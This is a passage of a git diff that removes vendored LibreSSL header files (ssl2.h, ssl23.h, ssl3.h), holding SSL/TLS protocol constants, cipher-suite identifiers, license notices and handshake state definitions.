-#define SSL2_VERSION		0x0002
-#define SSL2_VERSION_MAJOR	0x00
-#define SSL2_VERSION_MINOR	0x02
-/* #define SSL2_CLIENT_VERSION	0x0002 */
-/* #define SSL2_SERVER_VERSION	0x0002 */
-
-/* Protocol Message Codes */
-#define SSL2_MT_ERROR			0
-#define SSL2_MT_CLIENT_HELLO		1
-#define SSL2_MT_CLIENT_MASTER_KEY	2
-#define SSL2_MT_CLIENT_FINISHED		3
-#define SSL2_MT_SERVER_HELLO		4
-#define SSL2_MT_SERVER_VERIFY		5
-#define SSL2_MT_SERVER_FINISHED		6
-#define SSL2_MT_REQUEST_CERTIFICATE	7
-#define SSL2_MT_CLIENT_CERTIFICATE	8
-
-/* Error Message Codes */
-#define SSL2_PE_UNDEFINED_ERROR		0x0000
-#define SSL2_PE_NO_CIPHER		0x0001
-#define SSL2_PE_NO_CERTIFICATE		0x0002
-#define SSL2_PE_BAD_CERTIFICATE		0x0004
-#define SSL2_PE_UNSUPPORTED_CERTIFICATE_TYPE 0x0006
-
-/* Cipher Kind Values */
-#define SSL2_CK_NULL_WITH_MD5			0x02000000 /* v3 */
-#define SSL2_CK_RC4_128_WITH_MD5		0x02010080
-#define SSL2_CK_RC4_128_EXPORT40_WITH_MD5	0x02020080
-#define SSL2_CK_RC2_128_CBC_WITH_MD5		0x02030080
-#define SSL2_CK_RC2_128_CBC_EXPORT40_WITH_MD5	0x02040080
-#define SSL2_CK_IDEA_128_CBC_WITH_MD5		0x02050080
-#define SSL2_CK_DES_64_CBC_WITH_MD5		0x02060040
-#define SSL2_CK_DES_64_CBC_WITH_SHA		0x02060140 /* v3 */
-#define SSL2_CK_DES_192_EDE3_CBC_WITH_MD5	0x020700c0
-#define SSL2_CK_DES_192_EDE3_CBC_WITH_SHA	0x020701c0 /* v3 */
-#define SSL2_CK_RC4_64_WITH_MD5			0x02080080 /* MS hack */
-
-#define SSL2_CK_DES_64_CFB64_WITH_MD5_1		0x02ff0800 /* SSLeay */
-#define SSL2_CK_NULL				0x02ff0810 /* SSLeay */
-
-#define SSL2_TXT_DES_64_CFB64_WITH_MD5_1	"DES-CFB-M1"
-#define SSL2_TXT_NULL_WITH_MD5			"NULL-MD5"
-#define SSL2_TXT_RC4_128_WITH_MD5		"RC4-MD5"
-#define SSL2_TXT_RC4_128_EXPORT40_WITH_MD5	"EXP-RC4-MD5"
-#define SSL2_TXT_RC2_128_CBC_WITH_MD5		"RC2-CBC-MD5"
-#define SSL2_TXT_RC2_128_CBC_EXPORT40_WITH_MD5	"EXP-RC2-CBC-MD5"
-#define SSL2_TXT_IDEA_128_CBC_WITH_MD5		"IDEA-CBC-MD5"
-#define SSL2_TXT_DES_64_CBC_WITH_MD5		"DES-CBC-MD5"
-#define SSL2_TXT_DES_64_CBC_WITH_SHA		"DES-CBC-SHA"
-#define SSL2_TXT_DES_192_EDE3_CBC_WITH_MD5	"DES-CBC3-MD5"
-#define SSL2_TXT_DES_192_EDE3_CBC_WITH_SHA	"DES-CBC3-SHA"
-#define SSL2_TXT_RC4_64_WITH_MD5		"RC4-64-MD5"
-
-#define SSL2_TXT_NULL				"NULL"
-
-/* Flags for the SSL_CIPHER.algorithm2 field */
-#define SSL2_CF_5_BYTE_ENC			0x01
-#define SSL2_CF_8_BYTE_ENC			0x02
-
-/* Certificate Type Codes */
-#define SSL2_CT_X509_CERTIFICATE		0x01
-
-/* Authentication Type Code */
-#define SSL2_AT_MD5_WITH_RSA_ENCRYPTION		0x01
-
-#define SSL2_MAX_SSL_SESSION_ID_LENGTH		32
-
-/* Upper/Lower Bounds */
-#define SSL2_MAX_MASTER_KEY_LENGTH_IN_BITS	256
-#define SSL2_MAX_RECORD_LENGTH_2_BYTE_HEADER	32767u	/* 2^15-1 */
-#define SSL2_MAX_RECORD_LENGTH_3_BYTE_HEADER	16383	/* 2^14-1 */
-
-#define SSL2_CHALLENGE_LENGTH	16
-/*#define SSL2_CHALLENGE_LENGTH	32 */
-#define SSL2_MIN_CHALLENGE_LENGTH	16
-#define SSL2_MAX_CHALLENGE_LENGTH	32
-#define SSL2_CONNECTION_ID_LENGTH	16
-#define SSL2_MAX_CONNECTION_ID_LENGTH	16
-#define SSL2_SSL_SESSION_ID_LENGTH	16
-#define SSL2_MAX_CERT_CHALLENGE_LENGTH	32
-#define SSL2_MIN_CERT_CHALLENGE_LENGTH	16
-#define SSL2_MAX_KEY_MATERIAL_LENGTH	24
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl23.h b/thirdparty/libressl/include/openssl/ssl23.h
deleted file mode 100644
index 570e4b0..0000000
--- a/thirdparty/libressl/include/openssl/ssl23.h
+++ /dev/null
@@ -1,82 +0,0 @@
-/* $OpenBSD: ssl23.h,v 1.4 2014/12/14 15:30:50 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-
-#ifndef HEADER_SSL23_H
-#define HEADER_SSL23_H
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/*client */
-/* write to server */
-#define SSL23_ST_CW_CLNT_HELLO_A	(0x210|SSL_ST_CONNECT)
-#define SSL23_ST_CW_CLNT_HELLO_B	(0x211|SSL_ST_CONNECT)
-/* read from server */
-#define SSL23_ST_CR_SRVR_HELLO_A	(0x220|SSL_ST_CONNECT)
-#define SSL23_ST_CR_SRVR_HELLO_B	(0x221|SSL_ST_CONNECT)
-
-/* server */
-/* read from client */
-#define SSL23_ST_SR_CLNT_HELLO_A	(0x210|SSL_ST_ACCEPT)
-#define SSL23_ST_SR_CLNT_HELLO_B	(0x211|SSL_ST_ACCEPT)
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/ssl3.h b/thirdparty/libressl/include/openssl/ssl3.h
deleted file mode 100644
index 12ef56b..0000000
--- a/thirdparty/libressl/include/openssl/ssl3.h
+++ /dev/null
@@ -1,505 +0,0 @@
-/* $OpenBSD: ssl3.h,v 1.46 2017/08/28 17:36:58 jsing Exp $ */
-/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
- * All rights reserved.
- *
- * This package is an SSL implementation written
- * by Eric Young (eay@cryptsoft.com).
- * The implementation was written so as to conform with Netscapes SSL.
- *
- * This library is free for commercial and non-commercial use as long as
- * the following conditions are aheared to.  The following conditions
- * apply to all code found in this distribution, be it the RC4, RSA,
- * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
- * included with this distribution is covered by the same copyright terms
- * except that the holder is Tim Hudson (tjh@cryptsoft.com).
- *
- * Copyright remains Eric Young's, and as such any Copyright notices in
- * the code are not to be removed.
- * If this package is used in a product, Eric Young should be given attribution
- * as the author of the parts of the library used.
- * This can be in the form of a textual message at program startup or
- * in documentation (online or textual) provided with the package.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- * 1. Redistributions of source code must retain the copyright
- *    notice, this list of conditions and the following disclaimer.
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in the
- *    documentation and/or other materials provided with the distribution.
- * 3. All advertising materials mentioning features or use of this software
- *    must display the following acknowledgement:
- *    "This product includes cryptographic software written by
- *     Eric Young (eay@cryptsoft.com)"
- *    The word 'cryptographic' can be left out if the rouines from the library
- *    being used are not cryptographic related :-).
- * 4. If you include any Windows specific code (or a derivative thereof) from
- *    the apps directory (application code) you must include an acknowledgement:
- *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
- *
- * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
- * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
- * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
- * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
- * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
- * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
- * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
- * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
- * SUCH DAMAGE.
- *
- * The licence and distribution terms for any publically available version or
- * derivative of this code cannot be changed.  i.e. this code cannot simply be
- * copied and put under another distribution licence
- * [including the GNU Public Licence.]
- */
-/* ====================================================================
- * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer.
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-/* ====================================================================
- * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
- * ECC cipher suite support in OpenSSL originally developed by
- * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
- */
-
-#ifndef HEADER_SSL3_H
-#define HEADER_SSL3_H
-
-#include <openssl/opensslconf.h>
-#include <openssl/buffer.h>
-#include <openssl/evp.h>
-#include <openssl/ssl.h>
-
-#ifdef  __cplusplus
-extern "C" {
-#endif
-
-/* TLS_EMPTY_RENEGOTIATION_INFO_SCSV from RFC 5746. */
-#define SSL3_CK_SCSV				0x030000FF
-
-/* TLS_FALLBACK_SCSV from draft-ietf-tls-downgrade-scsv-03. */
-#define SSL3_CK_FALLBACK_SCSV			0x03005600
-
-#define SSL3_CK_RSA_NULL_MD5			0x03000001
-#define SSL3_CK_RSA_NULL_SHA			0x03000002
-#define SSL3_CK_RSA_RC4_40_MD5 			0x03000003
-#define SSL3_CK_RSA_RC4_128_MD5			0x03000004
-#define SSL3_CK_RSA_RC4_128_SHA			0x03000005
-#define SSL3_CK_RSA_RC2_40_MD5			0x03000006
-#define SSL3_CK_RSA_IDEA_128_SHA		0x03000007
-#define SSL3_CK_RSA_DES_40_CBC_SHA		0x03000008
-#define SSL3_CK_RSA_DES_64_CBC_SHA		0x03000009
-#define SSL3_CK_RSA_DES_192_CBC3_SHA		0x0300000A
-
-#define SSL3_CK_DH_DSS_DES_40_CBC_SHA		0x0300000B
-#define SSL3_CK_DH_DSS_DES_64_CBC_SHA		0x0300000C
-#define SSL3_CK_DH_DSS_DES_192_CBC3_SHA 	0x0300000D
-#define SSL3_CK_DH_RSA_DES_40_CBC_SHA		0x0300000E
-#define SSL3_CK_DH_RSA_DES_64_CBC_SHA		0x0300000F
-#define SSL3_CK_DH_RSA_DES_192_CBC3_SHA 	0x03000010
-
-#define SSL3_CK_EDH_DSS_DES_40_CBC_SHA		0x03000011
-#define SSL3_CK_EDH_DSS_DES_64_CBC_SHA		0x03000012
-#define SSL3_CK_EDH_DSS_DES_192_CBC3_SHA	0x03000013
-#define SSL3_CK_EDH_RSA_DES_40_CBC_SHA		0x03000014
-#define SSL3_CK_EDH_RSA_DES_64_CBC_SHA		0x03000015
-#define SSL3_CK_EDH_RSA_DES_192_CBC3_SHA	0x03000016
-
-#define SSL3_CK_ADH_RC4_40_MD5			0x03000017
-#define SSL3_CK_ADH_RC4_128_MD5			0x03000018
-#define SSL3_CK_ADH_DES_40_CBC_SHA		0x03000019
-#define SSL3_CK_ADH_DES_64_CBC_SHA		0x0300001A
-#define SSL3_CK_ADH_DES_192_CBC_SHA		0x0300001B
-
-/*    VRS Additional Kerberos5 entries
- */
-#define SSL3_CK_KRB5_DES_64_CBC_SHA		0x0300001E
-#define SSL3_CK_KRB5_DES_192_CBC3_SHA		0x0300001F
-#define SSL3_CK_KRB5_RC4_128_SHA		0x03000020
-#define SSL3_CK_KRB5_IDEA_128_CBC_SHA	       	0x03000021
-#define SSL3_CK_KRB5_DES_64_CBC_MD5       	0x03000022
-#define SSL3_CK_KRB5_DES_192_CBC3_MD5       	0x03000023
-#define SSL3_CK_KRB5_RC4_128_MD5	       	0x03000024
-#define SSL3_CK_KRB5_IDEA_128_CBC_MD5 		0x03000025
-
-#define SSL3_CK_KRB5_DES_40_CBC_SHA 		0x03000026
-#define SSL3_CK_KRB5_RC2_40_CBC_SHA 		0x03000027
-#define SSL3_CK_KRB5_RC4_40_SHA	 		0x03000028
-#define SSL3_CK_KRB5_DES_40_CBC_MD5 		0x03000029
-#define SSL3_CK_KRB5_RC2_40_CBC_MD5 		0x0300002A
-#define SSL3_CK_KRB5_RC4_40_MD5	 		0x0300002B
-
-#define SSL3_TXT_RSA_NULL_MD5			"NULL-MD5"
-#define SSL3_TXT_RSA_NULL_SHA			"NULL-SHA"
-#define SSL3_TXT_RSA_RC4_40_MD5 		"EXP-RC4-MD5"
-#define SSL3_TXT_RSA_RC4_128_MD5		"RC4-MD5"
-#define SSL3_TXT_RSA_RC4_128_SHA		"RC4-SHA"
-#define SSL3_TXT_RSA_RC2_40_MD5			"EXP-RC2-CBC-MD5"
-#define SSL3_TXT_RSA_IDEA_128_SHA		"IDEA-CBC-SHA"
-#define SSL3_TXT_RSA_DES_40_CBC_SHA		"EXP-DES-CBC-SHA"
-#define SSL3_TXT_RSA_DES_64_CBC_SHA		"DES-CBC-SHA"
-#define SSL3_TXT_RSA_DES_192_CBC3_SHA		"DES-CBC3-SHA"
-
-#define SSL3_TXT_DH_DSS_DES_40_CBC_SHA		"EXP-DH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_DH_DSS_DES_64_CBC_SHA		"DH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_DH_DSS_DES_192_CBC3_SHA 	"DH-DSS-DES-CBC3-SHA"
-#define SSL3_TXT_DH_RSA_DES_40_CBC_SHA		"EXP-DH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_DH_RSA_DES_64_CBC_SHA		"DH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_DH_RSA_DES_192_CBC3_SHA 	"DH-RSA-DES-CBC3-SHA"
-
-#define SSL3_TXT_EDH_DSS_DES_40_CBC_SHA		"EXP-EDH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_EDH_DSS_DES_64_CBC_SHA		"EDH-DSS-DES-CBC-SHA"
-#define SSL3_TXT_EDH_DSS_DES_192_CBC3_SHA	"EDH-DSS-DES-CBC3-SHA"
-#define SSL3_TXT_EDH_RSA_DES_40_CBC_SHA		"EXP-EDH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_EDH_RSA_DES_64_CBC_SHA		"EDH-RSA-DES-CBC-SHA"
-#define SSL3_TXT_EDH_RSA_DES_192_CBC3_SHA	"EDH-RSA-DES-CBC3-SHA"
-
-#define SSL3_TXT_ADH_RC4_40_MD5			"EXP-ADH-RC4-MD5"
-#define SSL3_TXT_ADH_RC4_128_MD5		"ADH-RC4-MD5"
-#define SSL3_TXT_ADH_DES_40_CBC_SHA		"EXP-ADH-DES-CBC-SHA"
-#define SSL3_TXT_ADH_DES_64_CBC_SHA		"ADH-DES-CBC-SHA"
-#define SSL3_TXT_ADH_DES_192_CBC_SHA		"ADH-DES-CBC3-SHA"
-
-#define SSL3_TXT_KRB5_DES_64_CBC_SHA		"KRB5-DES-CBC-SHA"
-#define SSL3_TXT_KRB5_DES_192_CBC3_SHA		"KRB5-DES-CBC3-SHA"
-#define SSL3_TXT_KRB5_RC4_128_SHA		"KRB5-RC4-SHA"
-#define SSL3_TXT_KRB5_IDEA_128_CBC_SHA	       	"KRB5-IDEA-CBC-SHA"
-#define SSL3_TXT_KRB5_DES_64_CBC_MD5       	"KRB5-DES-CBC-MD5"
-#define SSL3_TXT_KRB5_DES_192_CBC3_MD5       	"KRB5-DES-CBC3-MD5"
-#define SSL3_TXT_KRB5_RC4_128_MD5		"KRB5-RC4-MD5"
-#define SSL3_TXT_KRB5_IDEA_128_CBC_MD5 		"KRB5-IDEA-CBC-MD5"
-
-#define SSL3_TXT_KRB5_DES_40_CBC_SHA 		"EXP-KRB5-DES-CBC-SHA"
-#define SSL3_TXT_KRB5_RC2_40_CBC_SHA 		"EXP-KRB5-RC2-CBC-SHA"
-#define SSL3_TXT_KRB5_RC4_40_SHA	 	"EXP-KRB5-RC4-SHA"
-#define SSL3_TXT_KRB5_DES_40_CBC_MD5 		"EXP-KRB5-DES-CBC-MD5"
-#define SSL3_TXT_KRB5_RC2_40_CBC_MD5 		"EXP-KRB5-RC2-CBC-MD5"
-#define SSL3_TXT_KRB5_RC4_40_MD5	 	"EXP-KRB5-RC4-MD5"
-
-#define SSL3_SSL_SESSION_ID_LENGTH		32
-#define SSL3_MAX_SSL_SESSION_ID_LENGTH		32
-
-#define SSL3_MASTER_SECRET_SIZE			48
-#define SSL3_RANDOM_SIZE			32
-#define SSL3_SEQUENCE_SIZE			8
-#define SSL3_SESSION_ID_SIZE			32
-#define SSL3_CIPHER_VALUE_SIZE			2
-
-#define SSL3_RT_HEADER_LENGTH			5
-#define SSL3_HM_HEADER_LENGTH			4
-
-#define SSL3_ALIGN_PAYLOAD			8
-
-/* This is the maximum MAC (digest) size used by the SSL library.
- * Currently maximum of 20 is used by SHA1, but we reserve for
- * future extension for 512-bit hashes.
- */
-
-#define SSL3_RT_MAX_MD_SIZE			64
-
-/* Maximum block size used in all ciphersuites. Currently 16 for AES.
- */
-
-#define	SSL_RT_MAX_CIPHER_BLOCK_SIZE		16
-
-#define SSL3_RT_MAX_EXTRA			(16384)
-
-/* Maximum plaintext length: defined by SSL/TLS standards */
-#define SSL3_RT_MAX_PLAIN_LENGTH		16384
-/* Maximum compression overhead: defined by SSL/TLS standards */
-#define SSL3_RT_MAX_COMPRESSED_OVERHEAD		1024
-
-/* The standards give a maximum encryption overhead of 1024 bytes.
- * In practice the value is lower than this. The overhead is the maximum
- * number of padding bytes (256) plus the mac size.
- */
-#define SSL3_RT_MAX_ENCRYPTED_OVERHEAD	(256 + SSL3_RT_MAX_MD_SIZE)
-
-/* OpenSSL currently only uses a padding length of at most one block so
- * the send overhead is smaller.
- */
-
-#define SSL3_RT_SEND_MAX_ENCRYPTED_OVERHEAD \
-			(SSL_RT_MAX_CIPHER_BLOCK_SIZE + SSL3_RT_MAX_MD_SIZE)
-
-/* If compression isn't used don't include the compression overhead */
-#define SSL3_RT_MAX_COMPRESSED_LENGTH		SSL3_RT_MAX_PLAIN_LENGTH
-#define SSL3_RT_MAX_ENCRYPTED_LENGTH	\
-		(SSL3_RT_MAX_ENCRYPTED_OVERHEAD+SSL3_RT_MAX_COMPRESSED_LENGTH)
-#define SSL3_RT_MAX_PACKET_SIZE		\
-		(SSL3_RT_MAX_ENCRYPTED_LENGTH+SSL3_RT_HEADER_LENGTH)
-
-#define SSL3_MD_CLIENT_FINISHED_CONST	"\x43\x4C\x4E\x54"
-#define SSL3_MD_SERVER_FINISHED_CONST	"\x53\x52\x56\x52"
-
-#define SSL3_VERSION			0x0300
-#define SSL3_VERSION_MAJOR		0x03
-#define SSL3_VERSION_MINOR		0x00
-
-#define SSL3_RT_CHANGE_CIPHER_SPEC	20
-#define SSL3_RT_ALERT			21
-#define SSL3_RT_HANDSHAKE		22
-#define SSL3_RT_APPLICATION_DATA	23
-#define TLS1_RT_HEARTBEAT		24
-
-#define SSL3_AL_WARNING			1
-#define SSL3_AL_FATAL			2
-
-#define SSL3_AD_CLOSE_NOTIFY		 0
-#define SSL3_AD_UNEXPECTED_MESSAGE	10	/* fatal */
-#define SSL3_AD_BAD_RECORD_MAC		20	/* fatal */
-#define SSL3_AD_DECOMPRESSION_FAILURE	30	/* fatal */
-#define SSL3_AD_HANDSHAKE_FAILURE	40	/* fatal */
-#define SSL3_AD_NO_CERTIFICATE		41
-#define SSL3_AD_BAD_CERTIFICATE		42
-#define SSL3_AD_UNSUPPORTED_CERTIFICATE	43
-#define SSL3_AD_CERTIFICATE_REVOKED	44
-#define SSL3_AD_CERTIFICATE_EXPIRED	45
-#define SSL3_AD_CERTIFICATE_UNKNOWN	46
-#define SSL3_AD_ILLEGAL_PARAMETER	47	/* fatal */
-
-#define TLS1_HB_REQUEST		1
-#define TLS1_HB_RESPONSE	2
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-typedef struct ssl3_record_st {
-/*r */	int type;               /* type of record */
-/*rw*/	unsigned int length;    /* How many bytes available */
-/*r */	unsigned int off;       /* read/write offset into 'buf' */
-/*rw*/	unsigned char *data;    /* pointer to the record data */
-/*rw*/	unsigned char *input;   /* where the decode bytes are */
-/*r */  unsigned long epoch;    /* epoch number, needed by DTLS1 */
-/*r */  unsigned char seq_num[8]; /* sequence number, needed by DTLS1 */
-} SSL3_RECORD;
-
-typedef struct ssl3_buffer_st {
-	unsigned char *buf;	/* at least SSL3_RT_MAX_PACKET_SIZE bytes,
-	                         * see ssl3_setup_buffers() */
-	size_t len;		/* buffer size */
-	int offset;		/* where to 'copy from' */
-	int left;		/* how many bytes left */
-} SSL3_BUFFER;
-
-#endif
-
-#define SSL3_CT_RSA_SIGN			1
-#define SSL3_CT_DSS_SIGN			2
-#define SSL3_CT_RSA_FIXED_DH			3
-#define SSL3_CT_DSS_FIXED_DH			4
-#define SSL3_CT_RSA_EPHEMERAL_DH		5
-#define SSL3_CT_DSS_EPHEMERAL_DH		6
-#define SSL3_CT_FORTEZZA_DMS			20
-/* SSL3_CT_NUMBER is used to size arrays and it must be large
- * enough to contain all of the cert types defined either for
- * SSLv3 and TLSv1.
- */
-#define SSL3_CT_NUMBER			11
-
-
-#define SSL3_FLAGS_NO_RENEGOTIATE_CIPHERS	0x0001
-#define SSL3_FLAGS_DELAY_CLIENT_FINISHED	0x0002
-#define SSL3_FLAGS_POP_BUFFER			0x0004
-#define TLS1_FLAGS_TLS_PADDING_BUG		0x0
-#define TLS1_FLAGS_SKIP_CERT_VERIFY		0x0010
-#define TLS1_FLAGS_KEEP_HANDSHAKE		0x0020
-#define SSL3_FLAGS_CCS_OK			0x0080
-
-#ifndef OPENSSL_NO_SSL_INTERN
-
-struct ssl3_state_internal_st;
-
-typedef struct ssl3_state_st {
-	long flags;
-
-	unsigned char server_random[SSL3_RANDOM_SIZE];
-	unsigned char client_random[SSL3_RANDOM_SIZE];
-
-	SSL3_BUFFER rbuf;	/* read IO goes into here */
-	SSL3_BUFFER wbuf;	/* write IO goes into here */
-
-	/* we allow one fatal and one warning alert to be outstanding,
-	 * send close alert via the warning alert */
-	int alert_dispatch;
-	unsigned char send_alert[2];
-
-	struct {
-		int new_mac_secret_size;
-	} tmp;
-
-	struct ssl3_state_internal_st *internal;
-} SSL3_STATE;
-
-#endif
-
-/* SSLv3 */
-/*client */
-/* extra state */
-#define SSL3_ST_CW_FLUSH			(0x100|SSL_ST_CONNECT)
-/* write to server */
-#define SSL3_ST_CW_CLNT_HELLO_A			(0x110|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CLNT_HELLO_B			(0x111|SSL_ST_CONNECT)
-/* read from server */
-#define SSL3_ST_CR_SRVR_HELLO_A			(0x120|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SRVR_HELLO_B			(0x121|SSL_ST_CONNECT)
-#define DTLS1_ST_CR_HELLO_VERIFY_REQUEST_A	(0x126|SSL_ST_CONNECT)
-#define DTLS1_ST_CR_HELLO_VERIFY_REQUEST_B	(0x127|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_A			(0x130|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_B			(0x131|SSL_ST_CONNECT)
-#define SSL3_ST_CR_KEY_EXCH_A			(0x140|SSL_ST_CONNECT)
-#define SSL3_ST_CR_KEY_EXCH_B			(0x141|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_REQ_A			(0x150|SSL_ST_CONNECT)
-#define SSL3_ST_CR_CERT_REQ_B			(0x151|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SRVR_DONE_A			(0x160|SSL_ST_CONNECT)
-#define SSL3_ST_CR_SRVR_DONE_B			(0x161|SSL_ST_CONNECT)
-/* write to server */
-#define SSL3_ST_CW_CERT_A			(0x170|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_B			(0x171|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_C			(0x172|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_D			(0x173|SSL_ST_CONNECT)
-#define SSL3_ST_CW_KEY_EXCH_A			(0x180|SSL_ST_CONNECT)
-#define SSL3_ST_CW_KEY_EXCH_B			(0x181|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_VRFY_A			(0x190|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CERT_VRFY_B			(0x191|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CHANGE_A			(0x1A0|SSL_ST_CONNECT)
-#define SSL3_ST_CW_CHANGE_B			(0x1A1|SSL_ST_CONNECT)
